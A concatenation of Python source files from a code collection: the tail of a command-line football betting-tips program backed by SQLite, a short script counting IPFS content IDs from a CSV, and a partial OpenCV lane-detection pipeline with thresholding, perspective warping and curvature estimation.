elif match_result == 'Home Win' and (rec_bet == '2' or rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (rec_bet == '1' or rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (rec_bet == '1' or rec_bet == '2'):
main_cur.execute("UPDATE match_analysis SET bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Home Win' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and rec_bet == 'Avoid':
main_cur.execute("UPDATE match_analysis SET bet_result = 'Avoided' WHERE fid = ?", (fid,))
main_conn.commit()
else:
print('There was an error processing the bet result', fid, rec_bet, match_result)
continue
def test_bet_result():
"""Calculate the result of the test bet"""
main_cur.execute("SELECT fid, TEST_rec_bet, match_result FROM match_analysis WHERE TEST_bet_result "
"ISNULL AND match_result IS NOT NULL")
data = main_cur.fetchall()
for fid, Test_rec_bet, match_result in data:
if match_result == 'Home Win' and (Test_rec_bet == '1' or Test_rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (Test_rec_bet == '2' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (Test_rec_bet == '1x' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Won' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Home Win' and (Test_rec_bet == '2' or Test_rec_bet == '2x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Away Win' and (Test_rec_bet == '1' or Test_rec_bet == '1x'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
elif match_result == 'Draw' and (Test_rec_bet == '1' or Test_rec_bet == '2'):
main_cur.execute("UPDATE match_analysis SET TEST_bet_result ='Lost' WHERE fid = ?", (fid,))
main_conn.commit()
else:
print('There was an error processing the bet result', fid, Test_rec_bet, match_result)
continue
def view_match_results_5days():
"""View match results for the last 5 days"""
main_cur.execute("select match_datetime, match_analysis.country_league_name, home_team_name, "
"away_team_name, rec_bet, percentage_rec, match_result, bet_result from match_analysis "
"where match_datetime between datetime('now', '-5 days') and datetime('now') "
"and bet_result is not null ORDER BY match_datetime DESC")
data = main_cur.fetchall()
for match_datetime, country_league_name, home_tn, away_tn, rec_bet, percentage_rec, mr, br in data:
print(match_datetime + " | " + country_league_name + " | " + home_tn + " vs " + away_tn + " | " + rec_bet
+ " | " + str(round(percentage_rec, 2)) + " | " + mr + " | " + br)
# ------------------------------------Match Archive-----------------------------------------
def match_archive_insert():
"""Insert completed matches into the match archive"""
main_cur.execute('INSERT OR IGNORE INTO match_archive(match_datetime, country_name, league_name, '
'country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, home_win, '
'home_draw, away_draw, away_win, home_position, away_position, total_clubs, home_matches_played, '
'away_matches_played, home_matches_won, away_matches_won, home_matches_draw, away_matches_draw, '
'home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, home_team_form, '
'away_team_form, home_team_name_rank, away_team_name_rank, home_position_rank, away_position_rank,'
' home_form_rank, away_form_rank, home_gd_rank, away_gd_rank, home_points_total, '
'away_points_total, rec_bet, percentage_chance, percentage_rec, match_result, bet_result, '
'TEST_rec_bet, TEST_bet_result, match_url, league_url, league_winperc, single_chnc_margin, '
'double_chnc_margin, pos_weighting, team_name_weighting, form_weighting, gd_weighting, '
'pos_winrate, team_name_winrate, form_winrate, gd_winrate) '
'SELECT match_datetime, match_analysis.country_name, match_analysis.league_name, '
'match_analysis.country_league_name, home_team_name, home_team_id, away_team_name, away_team_ID, '
'home_win, home_draw, away_draw, away_win, home_position, away_position, total_clubs, '
'home_matches_played, away_matches_played, home_matches_won, away_matches_won, home_matches_draw, '
'away_matches_draw, home_matches_loss, away_matches_loss, home_goal_diff, away_goal_diff, '
'home_team_form, away_team_form, home_team_name_rank, away_team_name_rank, home_position_rank, '
'away_position_rank, home_form_rank, away_form_rank, home_gd_rank, away_gd_rank, home_points_total,'
' away_points_total, rec_bet, percentage_chance, percentage_rec, match_result, bet_result, '
'TEST_rec_bet, TEST_bet_result, match_url, league_url, league_winperc, single_chnc_margin, '
'double_chnc_margin, pos_weighting, team_name_weighting, form_weighting, gd_weighting, '
'pos_winrate, team_name_winrate, form_winrate, gd_winrate '
'FROM main.match_analysis INNER JOIN main.leagues '
'ON match_analysis.league_name = leagues.league_name WHERE TEST_bet_result is not null '
'AND bet_result is not null')
main_conn.commit()
# ------------------------------------Utility-----------------------------------------------
def backup_database():
"""Creates a backup for the main database"""
print("Creating a restore point")
datetime_now = datetime.datetime.now()
datetimestamp = str(datetime_now.year) + '_' + str(datetime_now.month) + '_' + str(datetime_now.day) + '_' + \
str(datetime_now.hour) + str(datetime_now.minute) + str(datetime_now.second)
copy2('main.db', 'databackup/archive_' + str(datetimestamp) + '.db')
def delete_oldest_database():
"""Deletes oldest database if the backup limit exceeds 30"""
database_list = os.listdir('databackup')
if len(database_list) > 10:
os.remove('databackup/' + database_list[0])
else:
pass
def backup_restore():
"""Restore backup from archives"""
while True:
file_list = sorted(os.listdir('databackup'))[::-1]
index = 0
print('The following backup files are available:')
print(' ')
for file in file_list:
index += 1
print(str(index) + '.', file)
print(' ')
try:
usr_prompt = int(input('Type the number corresponding with the backupfile you want to restore: ')) - 1
copy2('databackup/' + file_list[usr_prompt], 'main.db')
print(' ')
print('Restored', file_list[usr_prompt], 'to main.db')
divider()
break
except:
pass
print("please enter an option listed above")
divider()
def country_league_combine():
"""ccc"""
main_cur.execute("Select fid, country_name, league_name from match_archive")
data = main_cur.fetchall()
for fid, cn, ln in data:
cnc = str(cn).capitalize()
country_league_name = cnc + ' ' + ln
main_cur.execute("UPDATE match_archive SET country_league_name = ?, country_name = ? WHERE fid = ?",
(country_league_name, cnc, fid))
main_conn.commit()
def match_datetimeupdate():
"""Update match date time"""
main_cur.execute("SELECT match_datetime, fid from match_analysis")
data = main_cur.fetchall()
for ma, fid in data:
try:
split_datetime = ma.split(' ')
match_time = split_datetime[1]
split_date = split_datetime[0].split(':')
datetime_correct = split_date[0] + '-' + split_date[1] + '-' + split_date[2] + ' ' + match_time
main_cur.execute("UPDATE match_analysis SET match_datetime = ? WHERE fid = ?", (datetime_correct, fid))
main_conn.commit()
except:
split_datetime = ma.split(' ')
match_time = split_datetime[1] + ":00"
datetime_correct = split_datetime[0] + ' ' + match_time
main_cur.execute("UPDATE match_analysis SET match_datetime = ? WHERE fid = ?", (datetime_correct, fid))
main_conn.commit()
def divider():
"""Aesthetic divider"""
print('''
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
''')
# ------------------------------------Statistics------------------------------------------
def winrate_stats(league_names):
"""Show the program winrates and league winrates"""
print("Winrates for leagues are: ")
leagues_scanned = 0
league_winadds = 0
for country_league_name in league_names:
main_cur.execute("SELECT bet_result from match_archive WHERE country_league_name = ? "
"AND bet_result IS NOT NULL AND rec_bet <> 'Avoid'", country_league_name)
data = main_cur.fetchall()
if len(data) < 1:
league_winrate = 'There are no completed matches for this league in the database'
print(country_league_name[0], ":", league_winrate)
else:
won = 0
lost = 0
total_played = 0
for bet_result in data:
if bet_result[0] == 'Won':
won += 1
total_played += 1
elif bet_result[0] == 'Lost':
lost += 1
total_played += 1
else:
continue
league_winrate = floor((won / total_played) * 100)
print(country_league_name[0], ":", league_winrate)
league_winadds += int(league_winrate)
leagues_scanned += 1
program_winrate = league_winadds / leagues_scanned
print(" ")
print("Program winrate:", round(program_winrate, 2))
def odds_winrate():
"""Determine the winrate of lower odds"""
main_cur.execute("SELECT home_win, away_win, match_result from match_archive")
data = main_cur.fetchall()
win_0_5 = 0
win_1 = 0
win_1_5 = 0
win_2 = 0
win_2_5 = 0
win_3 = 0
win_more_3 = 0
loss_0_5 = 0
loss_1 = 0
loss_1_5 = 0
loss_2 = 0
loss_2_5 = 0
loss_3 = 0
loss_more_3 = 0
for home_win, away_win, match_result in data:
odds_diff = home_win - away_win
if odds_diff >= 0:
if 0.5 >= odds_diff >= 0:
if match_result == 'Home Win':
win_0_5 += 1
elif match_result == 'Draw':
win_0_5 += 1
elif match_result == 'Away Win':
loss_0_5 += 1
else:
print('Error')
break
elif 1 >= odds_diff > 0.5:
if match_result == 'Home Win':
win_1 += 1
elif match_result == 'Draw':
win_1 += 1
elif match_result == 'Away Win':
loss_1 += 1
else:
print('Error')
break
elif 1.5 >= odds_diff > 1:
if match_result == 'Home Win':
win_1_5 += 1
elif match_result == 'Draw':
win_1_5 += 1
elif match_result == 'Away Win':
loss_1_5 += 1
else:
print('Error')
break
elif 2 >= odds_diff > 1.5:
if match_result == 'Home Win':
win_2 += 1
elif match_result == 'Draw':
win_2 += 1
elif match_result == 'Away Win':
loss_2 += 1
else:
print('Error')
break
elif 2.5 >= odds_diff > 2:
if match_result == 'Home Win':
win_2_5 += 1
elif match_result == 'Draw':
win_2_5 += 1
elif match_result == 'Away Win':
loss_2_5 += 1
else:
print('Error')
break
elif 3 >= odds_diff > 2.5:
if match_result == 'Home Win':
win_3 += 1
elif match_result == 'Draw':
win_3 += 1
elif match_result == 'Away Win':
loss_3 += 1
else:
print('Error')
break
elif odds_diff > 3:
if match_result == 'Home Win':
win_more_3 += 1
elif match_result == 'Draw':
win_more_3 += 1
elif match_result == 'Away Win':
loss_more_3 += 1
else:
print('Error')
break
else:
print('Error')
break
elif odds_diff < 0:
odds_diff = abs(odds_diff)
if 0.5 >= odds_diff >= 0:
if match_result == 'Away Win':
win_0_5 += 1
elif match_result == 'Draw':
win_0_5 += 1
elif match_result == 'Home Win':
loss_0_5 += 1
else:
print('Error')
break
elif 1 >= odds_diff > 0.5:
if match_result == 'Away Win':
win_1 += 1
elif match_result == 'Draw':
win_1 += 1
elif match_result == 'Home Win':
loss_1 += 1
else:
print('Error')
break
elif 1.5 >= odds_diff > 1:
if match_result == 'Away Win':
win_1_5 += 1
elif match_result == 'Draw':
win_1_5 += 1
elif match_result == 'Home Win':
loss_1_5 += 1
else:
print('Error')
break
elif 2 >= odds_diff > 1.5:
if match_result == 'Away Win':
win_2 += 1
elif match_result == 'Draw':
win_2 += 1
elif match_result == 'Home Win':
loss_2 += 1
else:
print('Error')
break
elif 2.5 >= odds_diff > 2:
if match_result == 'Away Win':
win_2_5 += 1
elif match_result == 'Draw':
win_2_5 += 1
elif match_result == 'Home Win':
loss_2_5 += 1
else:
print('Error')
break
elif 3 >= odds_diff > 2.5:
if match_result == 'Away Win':
win_3 += 1
elif match_result == 'Draw':
win_3 += 1
elif match_result == 'Home Win':
loss_3 += 1
else:
print('Error')
break
elif odds_diff > 3:
if match_result == 'Away Win':
win_more_3 += 1
elif match_result == 'Draw':
win_more_3 += 1
elif match_result == 'Home Win':
loss_more_3 += 1
else:
print('Error')
break
else:
print('Error')
break
else:
print('Error')
break
winrate_0_5 = (win_0_5 / (win_0_5 + loss_0_5)) * 100
winrate_1 = (win_1 / (win_1 + loss_1)) * 100
winrate_1_5 = (win_1_5 / (win_1_5 + loss_1_5)) * 100
winrate_2 = (win_2 / (win_2 + loss_2)) * 100
winrate_2_5 = (win_2_5 / (win_2_5 + loss_2_5)) * 100
winrate_3 = (win_3 / (win_3 + loss_3)) * 100
winrate_more_3 = (win_more_3 / (win_more_3 + loss_more_3)) * 100
winrate_odds_all = (winrate_0_5 + winrate_1 + winrate_1_5 + winrate_2 + winrate_2_5 + winrate_3 + winrate_more_3)/7
print("Odds winrates are as follows:")
print("Odd difference ranges 0.5 or less:", round(winrate_0_5, 2))
print("Odd difference ranges 0.6 to 1.0:", round(winrate_1, 2))
print("Odd difference is ranges 1.1 and 1.5:", round(winrate_1_5, 2))
print("Odd difference is ranges 1.6 and 2.0:", round(winrate_2, 2))
print("Odd difference is ranges 2.1 and 2.5:", round(winrate_2_5, 2))
print("Odd difference is ranges 2.6 and 3.0:", round(winrate_3, 2))
print("Odd difference is greater than 3.0:", round(winrate_more_3, 2))
print(" ")
print("Average Odd Difference winrate:", winrate_odds_all)
# ------------------------------------Third level------------------------------------------
def sys_boot():
"""Run at startup"""
main_db_check()
# archive_db_check()
db_table_check()
def leagues_sect():
"""Adjust and view leagues in the database"""
divider()
while True:
print('''Edit Leagues:
What would you like to do?
1. View Leagues
2. Add Leagues
3. Remove Leagues
4. Return
''')
user_prompt = int(input("Selection: "))
if user_prompt == 1:
divider()
leagues_display()
divider()
elif user_prompt == 2:
while True:
divider()
league_update_add()
divider()
user_prompt = input("Would you like to add more leagues? Enter Y/y or N/n: ")
if user_prompt == 'y':
continue
elif user_prompt == 'n':
break
else:
pass
print("Please enter Y/N")
divider()
elif user_prompt == 3:
while True:
divider()
leagues_display()
divider()
main_cur.execute("SELECT country_name, league_name FROM leagues")
league_check = main_cur.fetchone()
if league_check is None:
break
else:
league_update_delete()
user_prompt = input("Would you like to delete more leagues? Enter Y/y or N/n: ")
if user_prompt == 'y':
continue
elif user_prompt == 'n':
break
else:
pass
print("Please enter Y/N")
divider()
elif user_prompt == 4:
break
else:
pass
print("please enter an option listed above")
divider()
def tips_sect():
"""Scrape and gather match data, then present the best tips"""
while True:
usr_input = input("Enter your maximum required accumulator: ")
try:
acca_limit = int(usr_input)
break
except:
print('----------------------------------------------')
print('Error! Please enter a number when prompted')
print('----------------------------------------------')
pass
print('''Fetching Tips. Please be patient...
''')
# Program Runtime
start_time = time.time()
# Create and manage restore points
backup_database()
delete_oldest_database()
# Collect match and bet results
match_results()
bet_result()
test_bet_result()
match_archive_insert()
# Delete databases over 3 months old and upcoming matches that haven't been played yet
analysis_delete_3month()
analysis_delete_upcoming()
# Delete data in match table and collect new match information
match_data_delete()
match_info(match_list_create(leagues_url_return()))
league_table_delete()
league_data_home(leagues_url_return())
league_data_away(leagues_url_return())
uefa_ranking_delete()
uefa_team_ranking()
league_winmargin(league_names_return())
league_winrate(league_names_return())
print("Updated league win rates and margins")
position_ranking_winrate(league_names_return())
team_name_ranking_winrate(league_names_return())
form_ranking_winrate(league_names_return())
gd_ranking_winrate(league_names_return())
print("Updated variable winrates")
pos_weighting_calc(league_names_return())
team_name_weighting_calc(league_names_return())
form_weighting_calc(league_names_return())
gd_weighting_calc(league_names_return())
print("Updated variable weightings")
analysis_insert()
team_ranking_calc_home()
team_ranking_calc_away()
form_ranking_calc()
league_position_ranking_calc()
goal_difference_ranking_calc()
generate_point_totals()
percentage_rec_calc()
print("Matches analysed")
divider()
print("Your recommended bets are:"
" ")
ticket_generation(acca_limit, odds_list())
print(" ")
print("--- Runtime: %s minutes ---" % ((time.time() - start_time) / 60))
def results_sect():
"""View recent results"""
print("Fetching match result..."
" ")
match_results()
print('Match results collected')
print('Processing bet results')
bet_result()
test_bet_result()
match_archive_insert()
view_match_results_5days()
def statistics_sect():
"""View statistics"""
while True:
user_prompt = int(input('''Which statistic would you like to see?:
1. See program and league winrates
2. Odds difference winrates
3. Return
Selection: '''))
if user_prompt == 1:
divider()
winrate_stats(league_names_return())
divider()
elif user_prompt == 2:
divider()
odds_winrate()
divider()
elif user_prompt == 3:
break
else:
print("please enter an option listed above")
divider()
# -------------------------------------Program--------------------------------------------------------------------------
def betterodds():
"""Betting Tips Program"""
sys_boot()
time.sleep(2)
divider()
# Welcome message
print("Thank you for using this program. If you have any questions regarding the use of this program please contact"
" Jinx13 at <EMAIL>")
divider()
time.sleep(2)
while True:
user_prompt = int(input('''Hi! Please enter the number corresponding the selection you would like to make
1. Get tips now!
2. View Match Results
3. Edit Leagues
4. See Statistics
5. Restore Database
6. Exit Program
Selection: '''))
if user_prompt == 1:
divider()
tips_sect()
divider()
elif user_prompt == 2:
divider()
results_sect()
divider()
elif user_prompt == 3:
leagues_sect()
divider()
elif user_prompt == 4:
divider()
statistics_sect()
divider()
elif user_prompt == 5:
divider()
backup_restore()
divider()
elif user_prompt == 6:
divider()
print('Exiting Program...Goodbye')
driver.quit()
break
else:
pass
print("please enter an option listed above")
betterodds()
# TODO create database most recent date feature
# TODO Create split between ticket display and retrieval
# TODO handle entry of league that is already in the database
# TODO handle match data collection with no leagues
``` |
{
"source": "jinxankit/scripts",
"score": 3
} |
#### File: jinxankit/scripts/main.py
```python
import ipfshttpclient
import csv
def csv1():
with open('output.csv', 'rt') as f:
data = csv.reader(f)
cid_set = set()
cid_dict = {}
for row in data:
cid_list, cids_dict = per_string(cid_set, cid_dict, row[0])
# print(len(cid_list), cid_list)
cids_dict = dict(sorted(cids_dict.items(), key=lambda x: x[1], reverse=True))
print(len(cids_dict), cids_dict)
with open('cids.txt', 'w') as f:
for item in cid_list:
f.write("%s\n" % item)
with open('dict.csv', 'w') as csv_file:
writer = csv.writer(csv_file)
for key, value in cids_dict.items():
if key != '':
writer.writerow([key, value])
def per_string(cid_set, cid_dict, uri):
try:
cid = uri[:]
qm_index = cid.find('Qm')
unique_cid = cid[qm_index:qm_index+46].strip()
cid_set.add(unique_cid)
if unique_cid in cid_dict:
cid_dict[unique_cid] += 1
else:
cid_dict[unique_cid] = 1
return cid_set, cid_dict
except Exception as e:
print(e)
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print_hi('PyCharm')
csv1()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
``` |
{
"source": "jinxed9/SCEP2",
"score": 3
} |
#### File: jinxed9/SCEP2/main.py
```python
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import os
import glob
from PIL import Image, ImageDraw, ImageFont
from render import renderVideoFFMPEG
from calibration import doCalibration
def warp(img):
#Define calibration box in source (original) and destination (desired or warped) coordinates
img_size = (img.shape[1], img.shape[0])
#Four source coordinates
src = np.float32(
[[200, 675],
[1100, 675],
[700, 450],
[580, 450]]
)
#Four desired coordinates
dst = np.float32(
[[200, 675],
[1100, 675],
[1100, 0],
[200, 0]]
)
# Compute the perspective transform, M
M = cv2.getPerspectiveTransform(src, dst)
# Create warped image - uses linear interpolation
warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
return warped
def unwarp(img):
#Define calibration box in source (original) and destination (desired or warped) coordinates
img_size = (img.shape[1], img.shape[0])
#Four source coordinates
src = np.float32(
[[200, 675],
[1100, 675],
[700, 450],
[580, 450]]
)
#Four desired coordinates
dst = np.float32(
[[200, 675],
[1100, 675],
[1100, 0],
[200, 0]]
)
# Could compute the inverse also by swapping the input parameters
Minv = cv2.getPerspectiveTransform(dst, src)
# Create warped image - uses linear interpolation
unwarped = cv2.warpPerspective(img, Minv, img_size, flags=cv2.INTER_LINEAR)
return unwarped
#------------- Video Processing ----------------------------
def getFrame(frame):
vidcap = cv2.VideoCapture('project_video.mp4')
ret, image = vidcap.read()
count = 0
while ret:
ret,image = vidcap.read()
print('Read a new frame: ', ret)
count += 1
print(count)
if count == frame:
cv2.imwrite("frame%d.jpg" % count, image)
break
#----------------- Begin Gradient -----------------------
def mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):
# Convert to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Take both Sobel x and y gradients
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
# Calculate the gradient magnitude
gradmag = np.sqrt(sobelx**2 + sobely**2)
# Rescale to 8 bit
scale_factor = np.max(gradmag)/255
gradmag = (gradmag/scale_factor).astype(np.uint8)
# Create a binary image of ones where threshold is met, zeros otherwise
binary_output = np.zeros_like(gradmag)
binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1
# Return the binary image
return binary_output
#----------------- Thesholding -----------------------------------
def doThresholding(img):
# Convert to HLS color space and separate the S channel
# Note: img is the undistorted image
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
s_channel = hls[:,:,2]
# Convert to grayscale
gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Sobel X
sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)# Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivate to accentuate line away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
thresh_min = 20
thresh_max = 100
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
# Threshold color channel
s_thresh_min = 170
s_thresh_max = 255
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1
# Stack each channel to view their individual contributions in green and blue respectively
# This returns a stack of the two binary images, whose components you can see as different colors
color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255
# Combine the two binary thresholds
combined_binary = np.zeros_like(sxbinary)
combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1
# Plotting thresholded images
#f, (ax1, ax2) = plt.subplots(1, 2, figsize=(20,10))
#ax1.set_title('Stacked thresholds')
#ax1.imshow(color_binary)
#ax2.set_title('Combined S channel and gradient thresholds')
#ax2.imshow(combined_binary, cmap='gray')
#plt.show()
return combined_binary
#------------------ Histogram -------------------
def hist(img):
# Grab only the bottom half of the image
# Lane lines are likely to be mostly vertical nearest to the car
bottom_half = img[img.shape[0]//2:,:]
# Sum across image pixels vertically - make sure to set an `axis`
# i.e. the highest areas of vertical lines should be larger values
histogram = np.sum(bottom_half, axis=0)
return histogram
#-------- Sliding Window ------------------------
def find_lane_pixels(binary_warped):
# Take a histogram of the bottom half of the image
histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
# Create an output image to draw on and visualize the result
out_img = np.dstack((binary_warped, binary_warped, binary_warped))
# Find the peak of the left and right halves of the histogram
# These will be the starting point for the left and right lines
midpoint = np.int(histogram.shape[0]//2)
leftx_base = np.argmax(histogram[:midpoint])
rightx_base = np.argmax(histogram[midpoint:]) + midpoint
# HYPERPARAMETERS
# Choose the number of sliding windows
nwindows = 9
# Set the width of the windows +/- margin
margin = 100
# Set minimum number of pixels found to recenter window
minpix = 50
# Set height of windows - based on nwindows above and image shape
window_height = np.int(binary_warped.shape[0]//nwindows)
# Identify the x and y positions of all nonzero pixels in the image
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
# Current positions to be updated later for each window in nwindows
leftx_current = leftx_base
rightx_current = rightx_base
# Create empty lists to receive left and right lane pixel indices
left_lane_inds = []
right_lane_inds = []
# Step through the windows one by one
for window in range(nwindows):
# Identify window boundaries in x and y (and right and left)
win_y_low = binary_warped.shape[0] - (window+1)*window_height
win_y_high = binary_warped.shape[0] - window*window_height
win_xleft_low = leftx_current - margin
win_xleft_high = leftx_current + margin
win_xright_low = rightx_current - margin
win_xright_high = rightx_current + margin
# Draw the windows on the visualization image
cv2.rectangle(out_img,(win_xleft_low,win_y_low),
(win_xleft_high,win_y_high),(0,255,0), 2)
cv2.rectangle(out_img,(win_xright_low,win_y_low),
(win_xright_high,win_y_high),(0,255,0), 2)
# Identify the nonzero pixels in x and y within the window #
good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &
(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices (previously was a list of lists of pixels)
try:
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
except ValueError:
# Avoids an error if the above is not implemented fully
pass
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
return leftx, lefty, rightx, righty, out_img
def measure_curvature_pixels(ploty, left_fit, right_fit):
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])
right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])
return left_curverad, right_curverad
def measure_curvature_real(ploty, left_fit_cr, right_fit_cr):
'''
Calculates the curvature of polynomial functions in meters.
'''
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30/720 # meters per pixel in y dimension
xm_per_pix = 3.7/700 # meters per pixel in x dimension
# Define y-value where we want radius of curvature
# We'll choose the maximum y-value, corresponding to the bottom of the image
y_eval = np.max(ploty)
# Calculation of R_curve (radius of curvature)
left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
return left_curverad, right_curverad
def fit_polynomial(binary_warped, print_stages=False):
# Find our lane pixels first
leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
# Fit a second order polynomial to each using `np.polyfit`
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )
try:
left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
except TypeError:
# Avoids an error if `left` and `right_fit` are still none or incorrect
print('The function failed to fit a line!')
left_fitx = 1*ploty**2 + 1*ploty
right_fitx = 1*ploty**2 + 1*ploty
## Visualization ##
# Colors in the left and right lane regions
out_img[lefty, leftx] = [255, 0, 0]
out_img[righty, rightx] = [0, 0, 255]
left_fitx_int = np.around(left_fitx)
left_fitx_int = left_fitx_int.astype(int)
right_fitx_int = np.around(right_fitx)
right_fitx_int = right_fitx_int.astype(int)
ploty_int = ploty.astype(int)
lines = np.zeros_like(out_img)
pts_left = np.vstack((left_fitx_int,ploty_int)).T
pts_right = np.vstack((right_fitx_int, ploty_int)).T
pts = np.append(pts_left, np.flip(pts_right, axis=0), axis=0)
# Draw the lane onto the warped blank image
cv2.fillPoly(lines, np.int_([pts]), (0,255, 0))
cv2.polylines(lines, np.int_([pts_left]), False, (255, 0, 0), thickness=30)
cv2.polylines(lines, np.int_([pts_right]), False, (0, 0, 255), thickness=30)
#plt.imshow(lines)
#plt.show()
if print_stages:
# Plots the left and right polynomials on the lane lines
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
cv2.polylines(out_img, np.int_([pts_left]), False, (255, 255, 0), thickness=10)
cv2.polylines(out_img, np.int_([pts_right]), False, (255, 255, 0), thickness=10)
plt.imsave(".\\output_images\\test%d_top_down.jpg" % count,out_img,cmap='gray')
# Calculation of vehicle position
xm_per_pix = 3.7/700 # meters per pixel in x dimension
left_lane = left_fitx_int[719]
right_lane = right_fitx_int[719]
center = 1280/2
lane_position = (right_lane+left_lane)/2
vehicle_position = (lane_position-center) * xm_per_pix
#left_curverad, right_curverad = measure_curvature_pixels(ploty,left_fit, right_fit)
left_curverad, right_curverad = measure_curvature_real(ploty, left_fit, right_fit)
#print(left_curverad, right_curverad)
radius = (left_curverad+right_curverad)/2
return lines, radius, vehicle_position
#----------------Do Lane Detection --------------
def doLaneDetection(img,print_stages=False):
#TODO: make sure this works on white lanes
# Thresholding
color_binary = doThresholding(img)
if print_stages:
plt.imsave(".\\output_images\\test%d_color_binary.jpg" % count,color_binary,cmap='gray')
# Perspective Transform
top_down = warp(color_binary)
#TODO: Add sliding window
#TODO: Add low pass filter
# Fit a Polynomial
out_img, radius, position = fit_polynomial(top_down, print_stages)
# Reverse Perspective Transform
out_img = unwarp(out_img)
cv2.putText(out_img,"Radius: %0dm" %radius,(10,100),cv2.FONT_HERSHEY_SIMPLEX,2,(255,255,255),2,cv2.LINE_AA)
cv2.putText(out_img,"Vehicle is %2fm left of center" %position,(10,200),cv2.FONT_HERSHEY_SIMPLEX,2,(255,255,255),2,cv2.LINE_AA)
#TODO: Add curvature and center position
# Draw lanes on image
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
stacked = cv2.addWeighted(img, 1, out_img, 0.5, 0)
